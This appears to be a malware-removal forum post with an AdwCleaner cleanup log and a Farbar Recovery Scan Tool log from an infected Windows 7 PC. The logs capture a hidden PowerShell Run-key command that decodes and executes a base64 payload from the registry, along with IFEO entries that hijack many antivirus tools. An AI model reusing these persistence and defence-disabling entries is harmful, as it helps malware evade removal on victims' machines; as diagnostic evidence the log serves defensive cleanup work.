***** [ DLL ] *****



***** [ WMI ] *****



***** [ Shortcuts ] *****



***** [ Scheduled Tasks ] *****



***** [ Registry ] *****

[-] Key deleted: HKCU\Software\eadc3112b5fd6bf3
[#] Key deleted on reboot: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\0A167702A96FE1D4DA3296FCA77354D9
[#] Key deleted on reboot: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\0A167702A96FE1D4DA3296FCA77354D9
[#] Key deleted on reboot: HKLM\SOFTWARE\Classes\Installer\Features\0A167702A96FE1D4DA3296FCA77354D9
[#] Key deleted on reboot: HKLM\SOFTWARE\Classes\Installer\Products\0A167702A96FE1D4DA3296FCA77354D9
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\eSafeSvc
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\SrvUpdater
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\winzipersvc
[-] Key deleted: HKLM\SOFTWARE\Classes\qmgcfiles
[-] Key deleted: HKLM\SOFTWARE\Classes\QQAppIEAgentEx.AgentForAndroid
[-] Key deleted: HKLM\SOFTWARE\Classes\QQAppIEAgentEx.AgentForAndroid.1
[-] Key deleted: HKLM\SOFTWARE\Classes\Speed Analysis 2.Navbar
[-] Key deleted: HKLM\SOFTWARE\Classes\Speed Analysis 2.Navbar.1
[-] Key deleted: HKLM\SOFTWARE\Classes\Speed Analysis 2.ScriptHostObject
[-] Key deleted: HKLM\SOFTWARE\Classes\Speed Analysis 2.ScriptHostObject.1
[-] Key deleted: HKLM\SOFTWARE\Classes\Speed Analysis 2.Tool
[-] Key deleted: HKLM\SOFTWARE\Classes\Speed Analysis 2.Tool.1
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{7A30415C-ABEE-4674-B64B-4CA145EEB0CA}
[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{6E1533F0-E0B5-465A-9F16-98FF0C76D493}
[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{8519F1E4-E25B-42B1-B361-0C643F45CF11}
[-] Key deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{50F4150A-48B2-417A-BE4C-C83F580FB904}
[-] Key deleted: HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\Conduit
[-] Key deleted: HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\INSTALLPATH\STATUS
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-3268508096-794200350-1188608446-1000\Software\Speed Analysis 2
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-3268508096-794200350-1188608446-1000\Software\SweetIM
[-] Key deleted: HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\1ClickMovie-Download V9.0
[#] Key deleted on reboot: HKCU\Software\Conduit
[#] Key deleted on reboot: HKCU\Software\INSTALLPATH\STATUS
[-] Key deleted: HKLM\SOFTWARE\mtAirtostrong
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Plants Vs Zombies
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Stpro.exe
[-] Value deleted: HKCU\Environment [SNF]
[-] Value deleted: HKCU\Environment [SNP]
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\QMContextScan.DLL
[-] Key deleted: HKLM\SOFTWARE\MozillaPlugins\@qq.com/npandroidassistant
[-] Key deleted: HKCU\Software\Classes\VirtualStore\MACHINE\SOFTWARE\Tencent
[-] Key deleted: HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AIRTOSTRONG.EXE
[#] Key deleted on reboot: HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\Stpro.exe
[-] Key deleted: HKEY_CLASSES_ROOT\.qmgc
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\Airtostrong.exe


***** [ Web browsers ] *****



*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C2].txt - [5257 Bytes] - [14/10/2016 22:04:06]
C:\AdwCleaner\AdwCleaner[C6].txt - [9873 Bytes] - [14/11/2015 17:22:31]
C:\AdwCleaner\AdwCleaner[R1].txt - [20631 Bytes] - [18/06/2015 15:02:17]
C:\AdwCleaner\AdwCleaner[R2].txt - [2882 Bytes] - [06/07/2015 1931]
C:\AdwCleaner\AdwCleaner[R3].txt - [13159 Bytes] - [17/07/2015 10:20:58]
C:\AdwCleaner\AdwCleaner[R4].txt - [3362 Bytes] - [12/08/2015 17:14:16]
C:\AdwCleaner\AdwCleaner[S1].txt - [18788 Bytes] - [18/06/2015 15:10:33]
C:\AdwCleaner\AdwCleaner[S2].txt - [2689 Bytes] - [06/07/2015 19:09:55]
C:\AdwCleaner\AdwCleaner[S3].txt - [12409 Bytes] - [17/07/2015 10:23:35]
C:\AdwCleaner\AdwCleaner[S4].txt - [3067 Bytes] - [12/08/2015 17:17:39]
C:\AdwCleaner\AdwCleaner[S6].txt - [9199 Bytes] - [14/11/2015 17:18:34]
C:\AdwCleaner\AdwCleaner[S7].txt - [494 Bytes] - [14/11/2015 17:32:19]
C:\AdwCleaner\AdwCleaner[S8].txt - [5977 Bytes] - [14/10/2016 21:58:51]

########## EOF - C:\AdwCleaner\AdwCleaner[C2].txt - [6209 Bytes] ##########

The FRST.txt file:
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 13-10-2016
Ran by violeta (administrator) on NIKOLA-PC (14-10-2016 22:30:46)
Running from C:\Users\violeta\Desktop
Loaded Profiles: violeta (Available Profiles: violeta)
Platform: Microsoft Windows 7 Professional Service Pack 1 (X86) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: https://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Hi-Rez Studios) C:\Program Files\Hi-Rez Studios\HiPatchService.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe
(LogMeIn, Inc.) C:\Program Files\LogMeIn Hamachi\LMIGuardianSvc.exe
() C:\Windows\System32\PnkBstrA.exe
() C:\Program Files\Razer\Razer Services\GSS\GameScannerService.exe
(Razer Inc.) C:\Program Files\Razer\Razer Cortex\RzKLService.exe
(www.shadowexplorer.com) C:\Program Files\ShadowExplorer\sesvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Rocket Division Software) C:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\TeamViewer_Service.exe
() C:\ProgramData\Telenor Internet\OnlineUpdate\ouc.exe
() C:\Program Files\TunnelBear\TBear.Maintenance.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(LogMeIn Inc.) C:\Program Files\LogMeIn Hamachi\hamachi-2.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\System32\wuauclt.exe
(Microsoft Corporation.) C:\Program Files\Microsoft\BingBar\7.1.362.0\SeaPort.EXE


==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [595992 2016-05-20] (Oracle Corporation)
HKLM\...\Run: [LogMeIn Hamachi Ui] => C:\Program Files\LogMeIn Hamachi\hamachi-2-ui.exe [5565960 2016-09-13] (LogMeIn Inc.)
HKLM\...\Run: [Lightshot] => C:\Program Files\Skillbrains\lightshot\Lightshot.exe [225944 2016-07-11] ()
HKLM\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\Run: [AlcoholAutomount] => C:\Program Files\Alcohol Soft\Alcohol 120\axcmd.exe [203928 2009-04-24] (Alcohol Soft Development Team)
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\Run: [{57E0064B-6CDF-4014-A8FF-F401291F5488}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\NYQUMMEV').KgJaKWdyhxnot)));
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\CurrentVersion\Windows: [Load] C:\Windows\system32\Microsoft.com <===== ATTENTION
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: E - E:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: H - H:\setup.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {77b5a5be-29d4-11e1-ac3d-806e6f6e6963} - D:\setup\rsrc\Autorun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {c0d6b2af-2ab0-11e1-8970-6c626daeeb0d} - E:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {c5841f0c-20e0-11e6-8237-6c626daeeb0d} - I:\INSTALL_ADB_RNDIS.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {cd9f060b-2c6a-11e1-a88a-6c626daeeb0d} - E:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {ed1d0150-29d4-11e1-b1db-6c626daeeb0d} - E:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {ed1d0177-29d4-11e1-b1db-6c626daeeb0d} - E:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {f4c05fa2-2a39-11e1-90e7-6c626daeeb0d} - F:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {f4c05fad-2a39-11e1-90e7-6c626daeeb0d} - F:\AutoRun.exe
HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [280576 2013-04-30] (Microsoft Corporation)
HKU\S-1-5-18\...\RunOnce: [SpUninstallDeleteDir] => rmdir /s /q "\SearchProtect"
HKU\S-1-5-18\...\Policies\Explorer: [HideSCAHealth] 1
IFEO\AvastSvc.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\AvastUI.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avcenter.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avconfig.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgcsrvx.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgidsagent.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgnt.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgrsx.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avguard.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgui.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgwdsvc.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avp.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avscan.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\bdagent.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\ccuac.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\ComboFix.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\coreFrameworkHost.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\coreServiceShell.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\egui.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\hijackthis.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\instup.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\keyscrambler.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\mbam.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\mbamgui.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\mbampt.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\mbamscheduler.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\mbamservice.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\MpCmdRun.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\MSASCui.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\MsMpEng.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\msseces.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\rstrui.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\spybotsd.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\SSScheduler.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\TuneUpUtilitiesApp32.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\TuneUpUtilitiesService32.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\uiSeAgnt.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\uiWatchDog.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\wireshark.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\zlclient.exe: [Debugger] C:\Windows\system32\Microsoft.com
ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => No File
ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => No File
ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => No File
Startup: C:\Users\violeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Registration RAYMAN [2015-03-20] ()
BootExecute: autocheck autochk * Partizan
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Winsock: Catalog5 09 C:\Program Files\Bonjour\mdnsNSP.dll [147456 2008-12-12] (Apple Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\..\Interfaces\{5A19095F-7933-4DA1-AD09-19E979DC22C7}: [NameServer] 217.65.192.101 217.65.192.102
Tcpip\..\Interfaces\{79289764-7478-4021-A6D0-8EAF6EFDDD53}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{79976A8E-F478-4642-88DD-27DD71B01DC2}: [DhcpNameServer] 172.18.12.1
Tcpip\..\Interfaces\{9F6CCFF6-FC61-4F75-BD9A-39A7BE019C6E}: [NameServer] 217.65.192.101 217.65.192.102
Tcpip\..\Interfaces\{C2E0376F-F85D-46E3-80E2-201AFBF0F518}: [NameServer] 217.65.192.101 217.65.192.102

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/p/?LinkId=619797&pc=UE07&ocid=UE07DHP
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\Microsoft\Internet Explorer\Main,SearchAssistant = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTxkij9_B3McXDvdSN6JAXeQNqF9tomnI4v_-Q-v4mvx2kMn7Bh-Xf-EJYEejn7YWcl-PlhbuddCMlP0mwyMzARSqo7-Wmu3hY49Niunccg3DmrDXz5ysmP3WX7Aete0Eac57BLcvq82zb4dfcwWjZDbkUtDIRutjgO4XjIKICjIB-c42AaU,&q={searchTerms}
URLSearchHook: [S-1-5-21-3268508096-794200350-1188608446-1000] ATTENTION => Default URLSearchHook is missing
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\.DEFAULT -> {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll [2009-02-26] (Microsoft Corporation)
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-05-25] (Microsoft Corporation)
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll [2016-02-01] (Skype Technologies)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-05-25] (Microsoft Corporation)
Handler: tmbp - {1A77E7DC-C9A0-4110-8A37-2F36BAE71ECF} - C:\Program Files\Trend Micro\AMSP\Module\20002\6.6.1010\6.6.1010\TmBpIe32.dll [2011-03-25] (Trend Micro Inc.)
Handler: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - C:\Program Files\Trend Micro\AMSP\Module\20004\1.5.1504\6.6.1088\TmIEPlg.dll [2010-07-20] (Trend Micro Inc.)

FireFox:
========
FF DefaultProfile: pgyttybc._
FF ProfilePath: C:\Users\violeta\AppData\Roaming\Mozilla\Firefox\Profiles\pgyttybc._ [2016-10-14]
FF Extension: (Skype Click to Call) - C:\Program Files\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A} [2016-09-24] [not signed]
FF Extension: (Skype) - C:\Program Files\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2016-05-25]
FF HKLM\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext => not found
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Users\violeta\AppData\Roaming\okitspace\Firefox => not found
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\WebexpEnhancedV1\WebexpEnhancedV1alpha842\ff => not found
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\VideoPlayerV3\VideoPlayerV3beta322\ff => not found
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_23_0_0_162.dll [2016-09-14] ()
FF Plugin: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw_1213153.dll [2014-06-24] (Adobe Systems, Inc.)
FF Plugin: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2012-07-31] (Foxit Corporation)
FF Plugin: @Google.com/GoogleEarthPlugin -> C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll [2015-05-21] (Google)
FF Plugin: @java.com/DTPlugin,version=11.91.2 -> C:\Program Files\Java\jre1.8.0_91\bin\dtplugin\npDeployJava1.dll [2016-07-11] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.91.2 -> C:\Program Files\Java\jre1.8.0_91\bin\plugin2\npjp2.dll [2016-07-11] (Oracle Corporation)
FF Plugin: @live.heroesandgenerals.com/npretox -> C:\Program Files\Heroes & Generals\live\npretox-1.0.6.1\npretoxlive-1.0.6.1.dll [2015-05-05] (Reto-Moto ApS)
FF Plugin: @mcafee.com/McAfeeMssPlugin -> C:\Program Files\McAfee Security Scan\3.8.141\npMcAfeeMss.dll [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=16.4.3503.0728 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll [2012-07-28] (Microsoft Corporation)
FF Plugin: @nexon.net/NxGame -> C:\ProgramData\NexonUS\NGM\npNxGameUS.dll [2013-02-05] (Nexon)
FF Plugin: @pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
FF Plugin: @real.com/nppl3260;version=16.0.2.32 -> C:\Program Files\Real\RealPlayer\Netscape6\nppl3260.dll [No File]
FF Plugin: @real.com/nprpplugin;version=16.0.2.32 -> C:\Program Files\Real\RealPlayer\Netscape6\nprpplugin.dll [No File]
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin HKU\S-1-5-21-3268508096-794200350-1188608446-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\violeta\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2016-07-14] (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-3268508096-794200350-1188608446-1000: pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
FF Plugin HKU\S-1-5-21-3268508096-794200350-1188608446-1000: thehappycloud.com/HappyCloudPlugin -> C:\ProgramData\HappyCloud\Application\npHappyCloudPlugin.dll [2013-11-17] (The Happy Cloud)
FF Plugin HKU\S-1-5-21-3268508096-794200350-1188608446-1000: ubisoft.com/uplaypc -> C:\Program Files\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll [2016-09-06] ()
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppl3260.dll [2013-08-15] (RealNetworks, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nprpplugin.dll [2013-08-15] (RealPlayer)

Chrome:
=======
CHR DefaultProfile: Profile 1
CHR HomePage: Profile 1 -> hxxps://www.google.rs/
CHR StartupUrls: Profile 1 -> "hxxp://www.google.com/","hxxp://www.sweet-page.com/?type=hp&ts=1434546381&z=ebb035f865ef946d91753c5g9z0c1zcw1zeq9c6bbz&from=cor&uid=WDCXWD5000AVVS-63H0B1_WD-WCAUK094765147651","hxxps://www.google.rs/"
CHR DefaultSearchURL: Profile 1 -> hxxp://www.sweet-page.com/web/?type=ds&ts=1434546381&z=ebb035f865ef946d91753c5g9z0c1zcw1zeq9c6bbz&from=cor&uid=WDCXWD5000AVVS-63H0B1_WD-WCAUK094765147651&q={searchTerms}
CHR DefaultSearchKeyword: Profile 1 -> sweet-page
CHR Session Restore: Profile 1 -> is enabled.
CHR Profile: C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Profile 1 [2016-09-11]
CHR Extension: (Google диск) - C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-01]
CHR Extension: (YouTube) - C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-10-02]
CHR Extension: (Google Search) - C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-01]
CHR Extension: (Google документи офлајн) - C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-12-12]
CHR Extension: (Плаћања у Chrome веб-продавници) - C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-08-11]
CHR Extension: (Gmail) - C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-06-18]
CHR HKU\S-1-5-21-3268508096-794200350-1188608446-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bhnddlaigdpagceekbpkajlgbnjbabig] - C:\Users\violeta\AppData\Local\CRE\bhnddlaigdpagceekbpkajlgbnjbabig.crx <not found>

Opera:
=======
OPR Extension: (Jungle Net) - C:\Users\violeta\AppData\Roaming\Opera Software\Opera Stable\Extensions\iffnkklnhcckdbakeemklgkangigdbbk [2015-06-17]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 c2cautoupdatesvc; C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1364096 2016-05-25] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1687680 2016-05-25] (Microsoft Corporation)
S3 c2wts; C:\Program Files\Windows Identity Foundation\v3.5\c2wtshost.exe [15768 2010-02-03] (Microsoft Corporation)
S3 EvoSvc; C:\Program Files\Echobit\Evolve\EvoSvc.exe [1583488 2015-08-18] (Echobit LLC)
S3 fussvc; C:\Program Files\Windows Kits\8.1\App Certification Kit\fussvc.exe [140800 2014-02-19] (Microsoft Corporation) [File not signed]
R2 Hamachi2Svc; C:\Program Files\LogMeIn Hamachi\hamachi-2.exe [1958408 2016-09-13] (LogMeIn Inc.)
U2 HiPatchService; C:\Program Files\Hi-Rez Studios\HiPatchService.exe [9728 2016-10-10] (Hi-Rez Studios) [File not signed]
S3 IDriverT; C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]
R2 IpOverUsbSvc; C:\Program Files\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe [22768 2014-04-17] (Microsoft Corporation)
R2 LMIGuardianSvc; C:\Program Files\LogMeIn Hamachi\LMIGuardianSvc.exe [405424 2016-08-31] (LogMeIn, Inc.)
S3 npggsvc; C:\Windows\system32\GameMon.des [5560840 2016-05-11] (INCA Internet Co., Ltd.)
S3 Origin Client Service; C:\Program Files\Origin\OriginClientService.exe [2142728 2016-10-11] (Electronic Arts)
S2 Origin Web Helper Service; C:\Program Files\Origin\OriginWebHelperService.exe [2209296 2016-10-11] (Electronic Arts)
S3 OverwolfUpdater; C:\Program Files\Overwolf\OverwolfUpdater.exe [1310448 2016-08-29] (Overwolf LTD)
R2 PnkBstrA; C:\Windows\system32\PnkBstrA.exe [76888 2012-11-03] ()
R2 Razer Game Scanner Service; C:\Program Files\Razer\Razer Services\GSS\GameScannerService.exe [188072 2015-08-15] ()
R2 RzKLService; C:\Program Files\Razer\Razer Cortex\RzKLService.exe [129168 2015-08-31] (Razer Inc.)
R2 sesvc; C:\Program Files\ShadowExplorer\sesvc.exe [9216 2013-01-02] (www.shadowexplorer.com) [File not signed]
S2 Skype C2C Service; C:\ProgramData\Skype\Toolbars\Skype C2C Service\c2c_service.exe [3048136 2012-05-30] () [File not signed]
R2 StarWindServiceAE; C:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe [275968 2007-05-28] (Rocket Division Software) [File not signed]
S3 Te.Service; C:\Program Files\Windows Kits\8.1\Testing\Runtimes\TAEF\Wex.Services.exe [91136 2013-08-21] (Microsoft Corporation) [File not signed]
R2 TeamViewer; C:\Program Files\TeamViewer\TeamViewer_Service.exe [6889232 2015-12-14] (TeamViewer GmbH)
S2 Telenor Internet. RunOuc; C:\Program Files\Telenor Internet\UpdateDog\ouc.exe [246112 2011-12-19] ()
R2 TunnelBearMaintenance; C:\Program Files\TunnelBear\TBear.Maintenance.exe [41472 2016-05-11] ()
S3 VsEtwService120; C:\Program Files\Microsoft Visual Studio 12.0\Common7\Packages\Debugger\Services\VsEtwService.exe [73360 2014-07-23] (Microsoft Corporation)
